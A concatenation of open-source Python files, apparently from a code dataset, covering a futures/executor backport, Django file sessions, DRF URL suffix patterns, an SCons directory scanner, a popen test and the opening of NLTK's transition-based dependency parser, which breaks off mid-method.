return_when: Indicates when this function should return. The options
are:
FIRST_COMPLETED - Return when any future finishes or is
cancelled.
FIRST_EXCEPTION - Return when any future finishes by raising an
exception. If no future raises an exception
then it is equivalent to ALL_COMPLETED.
ALL_COMPLETED - Return when all futures finish or are cancelled.
Returns:
A named 2-tuple of sets. The first set, named 'done', contains the
futures that completed (is finished or cancelled) before the wait
completed. The second set, named 'not_done', contains uncompleted
futures.
"""
with _AcquireFutures(fs):
done = set(f for f in fs
if f._state in [CANCELLED_AND_NOTIFIED, FINISHED])
not_done = set(fs) - done
if (return_when == FIRST_COMPLETED) and done:
return DoneAndNotDoneFutures(done, not_done)
elif (return_when == FIRST_EXCEPTION) and done:
if any(f for f in done
if not f.cancelled() and f.exception() is not None):
return DoneAndNotDoneFutures(done, not_done)
if len(done) == len(fs):
return DoneAndNotDoneFutures(done, not_done)
waiter = _create_and_install_waiters(fs, return_when)
waiter.event.wait(timeout)
for f in fs:
f._waiters.remove(waiter)
done.update(waiter.finished_futures)
return DoneAndNotDoneFutures(done, set(fs) - done)
class Future(object):
"""Represents the result of an asynchronous computation."""
def __init__(self):
"""Initializes the future. Should not be called by clients."""
self._condition = threading.Condition()
self._state = PENDING
self._result = None
self._exception = None
self._waiters = []
self._done_callbacks = []
def _invoke_callbacks(self):
for callback in self._done_callbacks:
try:
callback(self)
except Exception:
LOGGER.exception('exception calling callback for %r', self)
def __repr__(self):
with self._condition:
if self._state == FINISHED:
if self._exception:
return '<Future at %s state=%s raised %s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state],
self._exception.__class__.__name__)
else:
return '<Future at %s state=%s returned %s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state],
self._result.__class__.__name__)
return '<Future at %s state=%s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state])
def cancel(self):
"""Cancel the future if possible.
Returns True if the future was cancelled, False otherwise. A future
cannot be cancelled if it is running or has already completed.
"""
with self._condition:
if self._state in [RUNNING, FINISHED]:
return False
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
return True
self._state = CANCELLED
self._condition.notify_all()
self._invoke_callbacks()
return True
def cancelled(self):
"""Return True if the future has cancelled."""
with self._condition:
return self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]
def running(self):
"""Return True if the future is currently executing."""
with self._condition:
return self._state == RUNNING
def done(self):
"""Return True of the future was cancelled or finished executing."""
with self._condition:
return self._state in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]
def __get_result(self):
if self._exception:
raise self._exception
else:
return self._result
def add_done_callback(self, fn):
"""Attaches a callable that will be called when the future finishes.
Args:
fn: A callable that will be called with this future as its only
argument when the future completes or is cancelled. The callable
will always be called by a thread in the same process in which
it was added. If the future has already completed or been
cancelled then the callable will be called immediately. These
callables are called in the order that they were added.
"""
with self._condition:
if self._state not in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]:
self._done_callbacks.append(fn)
return
fn(self)
def result(self, timeout=None):
"""Return the result of the call that the future represents.
Args:
timeout: The number of seconds to wait for the result if the future
isn't done. If None, then there is no limit on the wait time.
Returns:
The result of the call that the future represents.
Raises:
CancelledError: If the future was cancelled.
TimeoutError: If the future didn't finish executing before the given
timeout.
Exception: If the call raised then that exception will be raised.
"""
with self._condition:
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self.__get_result()
self._condition.wait(timeout)
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self.__get_result()
else:
raise TimeoutError()
def exception(self, timeout=None):
"""Return the exception raised by the call that the future represents.
Args:
timeout: The number of seconds to wait for the exception if the
future isn't done. If None, then there is no limit on the wait
time.
Returns:
The exception raised by the call that the future represents or None
if the call completed without raising.
Raises:
CancelledError: If the future was cancelled.
TimeoutError: If the future didn't finish executing before the given
timeout.
"""
with self._condition:
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self._exception
self._condition.wait(timeout)
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self._exception
else:
raise TimeoutError()
# The following methods should only be used by Executors and in tests.
def set_running_or_notify_cancel(self):
"""Mark the future as running or process any cancel notifications.
Should only be used by Executor implementations and unit tests.
If the future has been cancelled (cancel() was called and returned
True) then any threads waiting on the future completing (through calls
to as_completed() or wait()) are notified and False is returned.
If the future was not cancelled then it is put in the running state
(future calls to running() will return True) and True is returned.
This method should be called by Executor implementations before
executing the work associated with this future. If this method returns
False then the work should not be executed.
Returns:
False if the Future was cancelled, True otherwise.
Raises:
RuntimeError: if this method was already called or if set_result()
or set_exception() was called.
"""
with self._condition:
if self._state == CANCELLED:
self._state = CANCELLED_AND_NOTIFIED
for waiter in self._waiters:
waiter.add_cancelled(self)
# self._condition.notify_all() is not necessary because
# self.cancel() triggers a notification.
return False
elif self._state == PENDING:
self._state = RUNNING
return True
else:
LOGGER.critical('Future %s in unexpected state: %s',
id(self),
self._state)
raise RuntimeError('Future in unexpected state')
def set_result(self, result):
"""Sets the return value of work associated with the future.
Should only be used by Executor implementations and unit tests.
"""
with self._condition:
self._result = result
self._state = FINISHED
for waiter in self._waiters:
waiter.add_result(self)
self._condition.notify_all()
self._invoke_callbacks()
def set_exception(self, exception):
"""Sets the result of the future as being the given exception.
Should only be used by Executor implementations and unit tests.
"""
with self._condition:
self._exception = exception
self._state = FINISHED
for waiter in self._waiters:
waiter.add_exception(self)
self._condition.notify_all()
self._invoke_callbacks()
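# Illustrative sketch (not part of the original module): driving a Future by
# hand through the state transitions an Executor would normally perform, then
# observing it with wait(). Real code obtains futures from Executor.submit().
def _example_future_lifecycle():
    f1, f2 = Future(), Future()
    f1.set_running_or_notify_cancel()          # PENDING -> RUNNING
    f1.set_result(42)                          # RUNNING -> FINISHED
    f2.cancel()                                # PENDING -> CANCELLED
    done, not_done = wait([f1, f2], timeout=0, return_when=FIRST_COMPLETED)
    assert done == set([f1]) and not_done == set([f2])
    return f1.result()                         # -> 42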
class Executor(object):
"""This is an abstract base class for concrete asynchronous executors."""
def submit(self, fn, *args, **kwargs):
"""Submits a callable to be executed with the given arguments.
Schedules the callable to be executed as fn(*args, **kwargs) and returns
a Future instance representing the execution of the callable.
Returns:
A Future representing the given call.
"""
raise NotImplementedError()
def map(self, fn, *iterables, **kwargs):
"""Returns a iterator equivalent to map(fn, iter).
Args:
fn: A callable that will take as many arguments as there are
passed iterables.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
Returns:
An iterator equivalent to: map(func, *iterables) but the calls may
be evaluated out-of-order.
Raises:
TimeoutError: If the entire result iterator could not be generated
before the given timeout.
Exception: If fn(*args) raises for any values.
"""
timeout = kwargs.get('timeout')
if timeout is not None:
end_time = timeout + time.time()
fs = [self.submit(fn, *args) for args in zip(*iterables)]
try:
for future in fs:
if timeout is None:
yield future.result()
else:
yield future.result(end_time - time.time())
finally:
for future in fs:
future.cancel()
def shutdown(self, wait=True):
"""Clean-up the resources associated with the Executor.
It is safe to call this method several times. Once shutdown has been
called, no other methods may be called on this executor.
Args:
wait: If True then shutdown will not return until all running
futures have finished executing and the resources used by the
executor have been reclaimed.
"""
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown(wait=True)
return False
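# Illustrative sketch (not part of the original module): a minimal Executor
# subclass that runs each call synchronously at submit() time, showing how
# Future, submit() and wait() fit together. Real executors hand fn off to
# worker threads or processes instead.
class _InlineExecutor(Executor):
    def submit(self, fn, *args, **kwargs):
        future = Future()
        if future.set_running_or_notify_cancel():     # PENDING -> RUNNING
            try:
                future.set_result(fn(*args, **kwargs))
            except BaseException as e:
                future.set_exception(e)
        return future

def _example_inline_executor():
    with _InlineExecutor() as executor:
        fs = [executor.submit(pow, 2, n) for n in range(4)]
    done, _ = wait(fs, return_when=ALL_COMPLETED)
    return sorted(f.result() for f in done)            # [1, 2, 4, 8]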
|
gpl-3.0
|
jarvys/django-1.7-jdb
|
django/contrib/sessions/backends/file.py
|
113
|
7663
|
import datetime
import errno
import logging
import os
import shutil
import tempfile
from django.conf import settings
from django.contrib.sessions.backends.base import SessionBase, CreateError, VALID_KEY_CHARS
from django.core.exceptions import SuspiciousOperation, ImproperlyConfigured
from django.utils import timezone
from django.utils.encoding import force_text
from django.contrib.sessions.exceptions import InvalidSessionKey
class SessionStore(SessionBase):
"""
Implements a file based session store.
"""
def __init__(self, session_key=None):
self.storage_path = type(self)._get_storage_path()
self.file_prefix = settings.SESSION_COOKIE_NAME
super(SessionStore, self).__init__(session_key)
@classmethod
def _get_storage_path(cls):
try:
return cls._storage_path
except AttributeError:
storage_path = getattr(settings, "SESSION_FILE_PATH", None)
if not storage_path:
storage_path = tempfile.gettempdir()
# Make sure the storage path is valid.
if not os.path.isdir(storage_path):
raise ImproperlyConfigured(
"The session storage path %r doesn't exist. Please set your"
" SESSION_FILE_PATH setting to an existing directory in which"
" Django can store session data." % storage_path)
cls._storage_path = storage_path
return storage_path
def _key_to_file(self, session_key=None):
"""
Get the file associated with this session key.
"""
if session_key is None:
session_key = self._get_or_create_session_key()
# Make sure we're not vulnerable to directory traversal. Session keys
# should always be md5s, so they should never contain directory
# components.
if not set(session_key).issubset(set(VALID_KEY_CHARS)):
raise InvalidSessionKey(
"Invalid characters in session key")
return os.path.join(self.storage_path, self.file_prefix + session_key)
def _last_modification(self):
"""
Return the modification time of the file storing the session's content.
"""
modification = os.stat(self._key_to_file()).st_mtime
if settings.USE_TZ:
modification = datetime.datetime.utcfromtimestamp(modification)
modification = modification.replace(tzinfo=timezone.utc)
else:
modification = datetime.datetime.fromtimestamp(modification)
return modification
def load(self):
session_data = {}
try:
with open(self._key_to_file(), "rb") as session_file:
file_data = session_file.read()
# Don't fail if there is no data in the session file.
# We may have opened the empty placeholder file.
if file_data:
try:
session_data = self.decode(file_data)
except (EOFError, SuspiciousOperation) as e:
if isinstance(e, SuspiciousOperation):
logger = logging.getLogger('django.security.%s' %
e.__class__.__name__)
logger.warning(force_text(e))
self.create()
# Remove expired sessions.
expiry_age = self.get_expiry_age(
modification=self._last_modification(),
expiry=session_data.get('_session_expiry'))
if expiry_age < 0:
session_data = {}
self.delete()
self.create()
except (IOError, SuspiciousOperation):
self.create()
return session_data
def create(self):
while True:
self._session_key = self._get_new_session_key()
try:
self.save(must_create=True)
except CreateError:
continue
self.modified = True
self._session_cache = {}
return
def save(self, must_create=False):
# Get the session data now, before we start messing
# with the file it is stored within.
session_data = self._get_session(no_load=must_create)
session_file_name = self._key_to_file()
try:
# Make sure the file exists. If it does not already exist, an
# empty placeholder file is created.
flags = os.O_WRONLY | os.O_CREAT | getattr(os, 'O_BINARY', 0)
if must_create:
flags |= os.O_EXCL
fd = os.open(session_file_name, flags)
os.close(fd)
except OSError as e:
if must_create and e.errno == errno.EEXIST:
raise CreateError
raise
# Write the session file without interfering with other threads
# or processes. By writing to an atomically generated temporary
# file and then using the atomic os.rename() to make the complete
# file visible, we avoid having to lock the session file, while
# still maintaining its integrity.
#
# Note: Locking the session file was explored, but rejected in part
# because in order to be atomic and cross-platform, it required a
# long-lived lock file for each session, doubling the number of
# files in the session storage directory at any given time. This
# rename solution is cleaner and avoids any additional overhead
# when reading the session data, which is the more common case
# unless SESSION_SAVE_EVERY_REQUEST = True.
#
# See ticket #8616.
dir, prefix = os.path.split(session_file_name)
try:
output_file_fd, output_file_name = tempfile.mkstemp(dir=dir,
prefix=prefix + '_out_')
renamed = False
try:
try:
os.write(output_file_fd, self.encode(session_data).encode())
finally:
os.close(output_file_fd)
# This will atomically rename the file (os.rename) if the OS
# supports it. Otherwise this will result in a shutil.copy2
# and os.unlink (for example on Windows). See #9084.
shutil.move(output_file_name, session_file_name)
renamed = True
finally:
if not renamed:
os.unlink(output_file_name)
except (OSError, IOError, EOFError):
pass
def exists(self, session_key):
return os.path.exists(self._key_to_file(session_key))
def delete(self, session_key=None):
if session_key is None:
if self.session_key is None:
return
session_key = self.session_key
try:
os.unlink(self._key_to_file(session_key))
except OSError:
pass
def clean(self):
pass
@classmethod
def clear_expired(cls):
storage_path = cls._get_storage_path()
file_prefix = settings.SESSION_COOKIE_NAME
for session_file in os.listdir(storage_path):
if not session_file.startswith(file_prefix):
continue
session_key = session_file[len(file_prefix):]
session = cls(session_key)
# When an expired session is loaded, its file is removed, and a
# new file is immediately created. Prevent this by disabling
# the create() method.
session.create = lambda: None
session.load()
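# Illustrative sketch (not part of the original module): a basic round trip
# through the file backend. Assumes a configured Django settings module
# (SECRET_KEY, SESSION_ENGINE pointing at this backend); if SESSION_FILE_PATH
# is unset, session files go to tempfile.gettempdir() as implemented above.
def _example_session_roundtrip():
    store = SessionStore()             # no key yet; one is created on save()
    store['user_id'] = 42
    store.save()
    reloaded = SessionStore(session_key=store.session_key)
    return reloaded['user_id']         # lazily re-reads the file written above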
|
bsd-3-clause
|
ClovisIRex/Snake-django
|
env/lib/python3.6/site-packages/rest_framework/urlpatterns.py
|
18
|
2407
|
from __future__ import unicode_literals
from django.conf.urls import url
from rest_framework.compat import RegexURLResolver, include
from rest_framework.settings import api_settings
def apply_suffix_patterns(urlpatterns, suffix_pattern, suffix_required):
ret = []
for urlpattern in urlpatterns:
if isinstance(urlpattern, RegexURLResolver):
# Set of included URL patterns
regex = urlpattern.regex.pattern
namespace = urlpattern.namespace
app_name = urlpattern.app_name
kwargs = urlpattern.default_kwargs
# Add in the included patterns, after applying the suffixes
patterns = apply_suffix_patterns(urlpattern.url_patterns,
suffix_pattern,
suffix_required)
ret.append(url(regex, include(patterns, namespace, app_name), kwargs))
else:
# Regular URL pattern
regex = urlpattern.regex.pattern.rstrip('$').rstrip('/') + suffix_pattern
view = urlpattern.callback
kwargs = urlpattern.default_args
name = urlpattern.name
# Add in both the existing and the new urlpattern
if not suffix_required:
ret.append(urlpattern)
ret.append(url(regex, view, kwargs, name))
return ret
def format_suffix_patterns(urlpatterns, suffix_required=False, allowed=None):
"""
Supplement existing urlpatterns with corresponding patterns that also
include a '.format' suffix. Retains urlpattern ordering.
urlpatterns:
A list of URL patterns.
suffix_required:
If `True`, only suffixed URLs will be generated, and non-suffixed
URLs will not be used. Defaults to `False`.
allowed:
An optional tuple/list of allowed suffixes. eg ['json', 'api']
Defaults to `None`, which allows any suffix.
"""
suffix_kwarg = api_settings.FORMAT_SUFFIX_KWARG
if allowed:
if len(allowed) == 1:
allowed_pattern = allowed[0]
else:
allowed_pattern = '(%s)' % '|'.join(allowed)
suffix_pattern = r'\.(?P<%s>%s)/?$' % (suffix_kwarg, allowed_pattern)
else:
suffix_pattern = r'\.(?P<%s>[a-z0-9]+)/?$' % suffix_kwarg
return apply_suffix_patterns(urlpatterns, suffix_pattern, suffix_required)
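# Illustrative sketch (not part of the original module): wrapping a small
# urlconf so that '/things/' is also reachable as '/things.json' or
# '/things.api'. Assumes a configured Django settings module; the view below
# is a hypothetical stand-in for a real DRF view.
def _example_suffix_patterns():
    def thing_list(request, format=None):     # placeholder view
        return None
    return format_suffix_patterns([
        url(r'^things/$', thing_list, name='thing-list'),
    ], allowed=['json', 'api'])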
|
mit
|
exploreodoo/datStruct
|
odoo/addons/stock/wizard/__init__.py
|
323
|
1149
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock_move
import stock_return_picking
import stock_change_product_qty
import make_procurement_product
import orderpoint_procurement
import stock_transfer_details
|
gpl-2.0
|
loongson-community/EFI-MIPS
|
ToolKit/cmds/python/Lib/test/skipped/test_popen.py
|
24
|
1397
|
#! /usr/bin/env python
"""Basic tests for os.popen()
Particularly useful for platforms that fake popen.
"""
import os
import sys
from test.test_support import TestSkipped
from os import popen
# Test that command-lines get down as we expect.
# To do this we execute:
# python -c "import sys;print sys.argv" {rest_of_commandline}
# This results in Python being spawned and printing the sys.argv list.
# We can then eval() the result of this, and see what each argv was.
python = sys.executable
if ' ' in python:
python = '"' + python + '"' # quote embedded space for cmdline
def _do_test_commandline(cmdline, expected):
cmd = '%s -c "import sys;print sys.argv" %s' % (python, cmdline)
data = popen(cmd).read()
got = eval(data)[1:] # strip off argv[0]
if got != expected:
print "Error in popen commandline handling."
print " executed '%s', expected '%r', but got '%r'" \
% (cmdline, expected, got)
def _test_commandline():
_do_test_commandline("foo bar", ["foo", "bar"])
_do_test_commandline('foo "spam and eggs" "silly walk"', ["foo", "spam and eggs", "silly walk"])
_do_test_commandline('foo "a \\"quoted\\" arg" bar', ["foo", 'a "quoted" arg', "bar"])
print "popen seemed to process the command-line correctly"
def main():
print "Test popen:"
_test_commandline()
main()
|
bsd-3-clause
|
bubichain/blockchain
|
src/3rd/src/jsoncpp/scons-2.1.0/engine/SCons/Scanner/Dir.py
|
21
|
3810
|
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Scanner/Dir.py 5357 2011/09/09 21:31:03 bdeegan"
import SCons.Node.FS
import SCons.Scanner
def only_dirs(nodes):
is_Dir = lambda n: isinstance(n.disambiguate(), SCons.Node.FS.Dir)
return list(filter(is_Dir, nodes))
def DirScanner(**kw):
"""Return a prototype Scanner instance for scanning
directories for on-disk files"""
kw['node_factory'] = SCons.Node.FS.Entry
kw['recursive'] = only_dirs
return SCons.Scanner.Base(scan_on_disk, "DirScanner", **kw)
def DirEntryScanner(**kw):
"""Return a prototype Scanner instance for "scanning"
directory Nodes for their in-memory entries"""
kw['node_factory'] = SCons.Node.FS.Entry
kw['recursive'] = None
return SCons.Scanner.Base(scan_in_memory, "DirEntryScanner", **kw)
skip_entry = {}
skip_entry_list = [
'.',
'..',
'.sconsign',
# Used by the native dblite.py module.
'.sconsign.dblite',
# Used by dbm and dumbdbm.
'.sconsign.dir',
# Used by dbm.
'.sconsign.pag',
# Used by dumbdbm.
'.sconsign.dat',
'.sconsign.bak',
# Used by some dbm emulations using Berkeley DB.
'.sconsign.db',
]
for skip in skip_entry_list:
skip_entry[skip] = 1
skip_entry[SCons.Node.FS._my_normcase(skip)] = 1
do_not_scan = lambda k: k not in skip_entry
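# Illustrative sketch (not part of the original module): the effect of the
# do_not_scan() predicate used by both scanning functions below.
def _example_do_not_scan():
    names = ['.', '..', '.sconsign.dblite', 'SConscript', 'src']
    return list(filter(do_not_scan, names))    # ['SConscript', 'src']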
def scan_on_disk(node, env, path=()):
"""
Scans a directory for on-disk files and directories therein.
Looking up the entries will add these to the in-memory Node tree
representation of the file system, so all we have to do is just
that and then call the in-memory scanning function.
"""
try:
flist = node.fs.listdir(node.abspath)
except (IOError, OSError):
return []
e = node.Entry
for f in filter(do_not_scan, flist):
# Add ./ to the beginning of the file name so if it begins with a
# '#' we don't look it up relative to the top-level directory.
e('./' + f)
return scan_in_memory(node, env, path)
def scan_in_memory(node, env, path=()):
"""
"Scans" a Node.FS.Dir for its in-memory entries.
"""
try:
entries = node.entries
except AttributeError:
# It's not a Node.FS.Dir (or doesn't look enough like one for
# our purposes), which can happen if a target list containing
# mixed Node types (Dirs and Files, for example) has a Dir as
# the first entry.
return []
entry_list = sorted(filter(do_not_scan, list(entries.keys())))
return [entries[n] for n in entry_list]
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
apache-2.0
|
zimmermegan/smarda
|
nltk-3.0.3/nltk/parse/transitionparser.py
|
5
|
31354
|
# Natural Language Toolkit: Arc-Standard and Arc-eager Transition Based Parsers
#
# Author: Long Duong <[email protected]>
#
# Copyright (C) 2001-2015 NLTK Project
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
import pickle
from os import remove
from copy import deepcopy
from operator import itemgetter
try:
from numpy import array
from scipy import sparse
from sklearn.datasets import load_svmlight_file
from sklearn import svm
except ImportError:
pass
from nltk.parse import ParserI, DependencyGraph, DependencyEvaluator
class Configuration(object):
"""
Class for holding configuration which is the partial analysis of the input sentence.
The transition based parser aims at finding set of operators that transfer the initial
configuration to the terminal configuration.
The configuration includes:
- Stack: for storing partially proceeded words
- Buffer: for storing remaining input words
- Set of arcs: for storing partially built dependency tree
This class also provides a method to represent a configuration as list of features.
"""
def __init__(self, dep_graph):
"""
:param dep_graph: the representation of an input in the form of dependency graph.
:type dep_graph: DependencyGraph where the dependencies are not specified.
"""
# dep_graph.nodes contain list of token for a sentence
self.stack = [0] # The root element
self.buffer = list(range(1, len(dep_graph.nodes))) # The rest is in the buffer
self.arcs = [] # empty set of arc
self._tokens = dep_graph.nodes
self._max_address = len(self.buffer)
def __str__(self):
return 'Stack : ' + \
str(self.stack) + ' Buffer : ' + str(self.buffer) + ' Arcs : ' + str(self.arcs)
def _check_informative(self, feat, flag=False):
"""
Check whether a feature is informative
The flag control whether "_" is informative or not
"""
if feat is None:
return False
if feat == '':
return False
if flag is False:
if feat == '_':
return False
return True
def extract_features(self):
"""
Extract the set of features for the current configuration. Implement standard features as described in
Table 3.2 (page 31) in Dependency Parsing book by Sandra Kubler, Ryan McDonald, Joakim Nivre.
Please note that these features are very basic.
:return: list(str)
"""
result = []
# Todo : can come up with more complicated features set for better
# performance.
if len(self.stack) > 0:
# Stack 0
stack_idx0 = self.stack[len(self.stack) - 1]
token = self._tokens[stack_idx0]
if self._check_informative(token['word'], True):
result.append('STK_0_FORM_' + token['word'])
if 'lemma' in token and self._check_informative(token['lemma']):
result.append('STK_0_LEMMA_' + token['lemma'])
if self._check_informative(token['tag']):
result.append('STK_0_POS_' + token['tag'])
if 'feats' in token and self._check_informative(token['feats']):
feats = token['feats'].split("|")
for feat in feats:
result.append('STK_0_FEATS_' + feat)
# Stack 1
if len(self.stack) > 1:
stack_idx1 = self.stack[len(self.stack) - 2]
token = self._tokens[stack_idx1]
if self._check_informative(token['tag']):
result.append('STK_1_POS_' + token['tag'])
# Left most, right most dependency of stack[0]
left_most = 1000000
right_most = -1
dep_left_most = ''
dep_right_most = ''
for (wi, r, wj) in self.arcs:
if wi == stack_idx0:
if (wj > wi) and (wj > right_most):
right_most = wj
dep_right_most = r
if (wj < wi) and (wj < left_most):
left_most = wj
dep_left_most = r
if self._check_informative(dep_left_most):
result.append('STK_0_LDEP_' + dep_left_most)
if self._check_informative(dep_right_most):
result.append('STK_0_RDEP_' + dep_right_most)
# Check Buffered 0
if len(self.buffer) > 0:
# Buffer 0
buffer_idx0 = self.buffer[0]
token = self._tokens[buffer_idx0]
if self._check_informative(token['word'], True):
result.append('BUF_0_FORM_' + token['word'])
if 'lemma' in token and self._check_informative(token['lemma']):
result.append('BUF_0_LEMMA_' + token['lemma'])
if self._check_informative(token['tag']):
result.append('BUF_0_POS_' + token['tag'])
if 'feats' in token and self._check_informative(token['feats']):
feats = token['feats'].split("|")
for feat in feats:
result.append('BUF_0_FEATS_' + feat)
# Buffer 1
if len(self.buffer) > 1:
buffer_idx1 = self.buffer[1]
token = self._tokens[buffer_idx1]
if self._check_informative(token['word'], True):
result.append('BUF_1_FORM_' + token['word'])
if self._check_informative(token['tag']):
result.append('BUF_1_POS_' + token['tag'])
if len(self.buffer) > 2:
buffer_idx2 = self.buffer[2]
token = self._tokens[buffer_idx2]
if self._check_informative(token['tag']):
result.append('BUF_2_POS_' + token['tag'])
if len(self.buffer) > 3:
buffer_idx3 = self.buffer[3]
token = self._tokens[buffer_idx3]
if self._check_informative(token['tag']):
result.append('BUF_3_POS_' + token['tag'])
# Left most, right most dependency of stack[0]
left_most = 1000000
right_most = -1
dep_left_most = ''
dep_right_most = ''
for (wi, r, wj) in self.arcs:
if wi == buffer_idx0:
if (wj > wi) and (wj > right_most):
right_most = wj
dep_right_most = r
if (wj < wi) and (wj < left_most):
left_most = wj
dep_left_most = r
if self._check_informative(dep_left_most):
result.append('BUF_0_LDEP_' + dep_left_most)
if self._check_informative(dep_right_most):
result.append('BUF_0_RDEP_' + dep_right_most)
return result
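# Illustrative sketch (not part of the original module): the initial
# configuration for a two-word sentence. The tokens are hypothetical; demo()
# below walks through full transition sequences.
def _example_initial_configuration():
    gold = DependencyGraph("Economic JJ 2 ATT\nnews NN 0 ROOT")
    conf = Configuration(gold)
    # stack holds the artificial root; buffer holds the two word indices
    return conf.stack, conf.buffer, conf.extract_features()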
class Transition(object):
"""
This class defines a set of transition which is applied to a configuration to get another configuration
Note that for different parsing algorithm, the transition is different.
"""
# Define set of transitions
LEFT_ARC = 'LEFTARC'
RIGHT_ARC = 'RIGHTARC'
SHIFT = 'SHIFT'
REDUCE = 'REDUCE'
def __init__(self, alg_option):
"""
:param alg_option: the algorithm option of this parser. Currently supports the `arc-standard` and `arc-eager` algorithms
:type alg_option: str
"""
self._algo = alg_option
if alg_option not in [
TransitionParser.ARC_STANDARD,
TransitionParser.ARC_EAGER]:
raise ValueError(" Currently we only support %s and %s " %
(TransitionParser.ARC_STANDARD, TransitionParser.ARC_EAGER))
def left_arc(self, conf, relation):
"""
Note that the algorithm for left-arc is quite similar except for precondition for both arc-standard and arc-eager
:param configuration: is the current configuration
:return : A new configuration or -1 if the pre-condition is not satisfied
"""
if (len(conf.buffer) <= 0) or (len(conf.stack) <= 0):
return -1
if conf.buffer[0] == 0:
# here is the Root element
return -1
idx_wi = conf.stack[len(conf.stack) - 1]
flag = True
if self._algo == TransitionParser.ARC_EAGER:
for (idx_parent, r, idx_child) in conf.arcs:
if idx_child == idx_wi:
flag = False
if flag:
conf.stack.pop()
idx_wj = conf.buffer[0]
conf.arcs.append((idx_wj, relation, idx_wi))
else:
return -1
def right_arc(self, conf, relation):
"""
Note that the algorithm for right-arc is DIFFERENT for arc-standard and arc-eager
:param configuration: is the current configuration
:return : A new configuration or -1 if the pre-condition is not satisfied
"""
if (len(conf.buffer) <= 0) or (len(conf.stack) <= 0):
return -1
if self._algo == TransitionParser.ARC_STANDARD:
idx_wi = conf.stack.pop()
idx_wj = conf.buffer[0]
conf.buffer[0] = idx_wi
conf.arcs.append((idx_wi, relation, idx_wj))
else: # arc-eager
idx_wi = conf.stack[len(conf.stack) - 1]
idx_wj = conf.buffer.pop(0)
conf.stack.append(idx_wj)
conf.arcs.append((idx_wi, relation, idx_wj))
def reduce(self, conf):
"""
Note that the algorithm for reduce is only available for arc-eager
:param configuration: is the current configuration
:return : A new configuration or -1 if the pre-condition is not satisfied
"""
if self._algo != TransitionParser.ARC_EAGER:
return -1
if len(conf.stack) <= 0:
return -1
idx_wi = conf.stack[len(conf.stack) - 1]
flag = False
for (idx_parent, r, idx_child) in conf.arcs:
if idx_child == idx_wi:
flag = True
if flag:
conf.stack.pop() # reduce it
else:
return -1
def shift(self, conf):
"""
Note that the algorithm for shift is the SAME for arc-standard and arc-eager
:param configuration: is the current configuration
:return : A new configuration or -1 if the pre-condition is not satisfied
"""
if len(conf.buffer) <= 0:
return -1
idx_wi = conf.buffer.pop(0)
conf.stack.append(idx_wi)
class TransitionParser(ParserI):
"""
Class for transition based parser. Implement 2 algorithms which are "arc-standard" and "arc-eager"
"""
ARC_STANDARD = 'arc-standard'
ARC_EAGER = 'arc-eager'
def __init__(self, algorithm):
"""
:param algorithm: the algorithm option of this parser. Currently supports the `arc-standard` and `arc-eager` algorithms
:type algorithm: str
"""
if not(algorithm in [self.ARC_STANDARD, self.ARC_EAGER]):
raise ValueError(" Currently we only support %s and %s " %
(self.ARC_STANDARD, self.ARC_EAGER))
self._algorithm = algorithm
self._dictionary = {}
self._transition = {}
self._match_transition = {}
def _get_dep_relation(self, idx_parent, idx_child, depgraph):
p_node = depgraph.nodes[idx_parent]
c_node = depgraph.nodes[idx_child]
if c_node['word'] is None:
return None # Root word
if c_node['head'] == p_node['address']:
return c_node['rel']
else:
return None
def _convert_to_binary_features(self, features):
"""
:param features: list of feature string which is needed to convert to binary features
:type features: list(str)
:return : string of binary features in libsvm format which is 'featureID:value' pairs
"""
unsorted_result = []
for feature in features:
self._dictionary.setdefault(feature, len(self._dictionary))
unsorted_result.append(self._dictionary[feature])
# Default value of each feature is 1.0
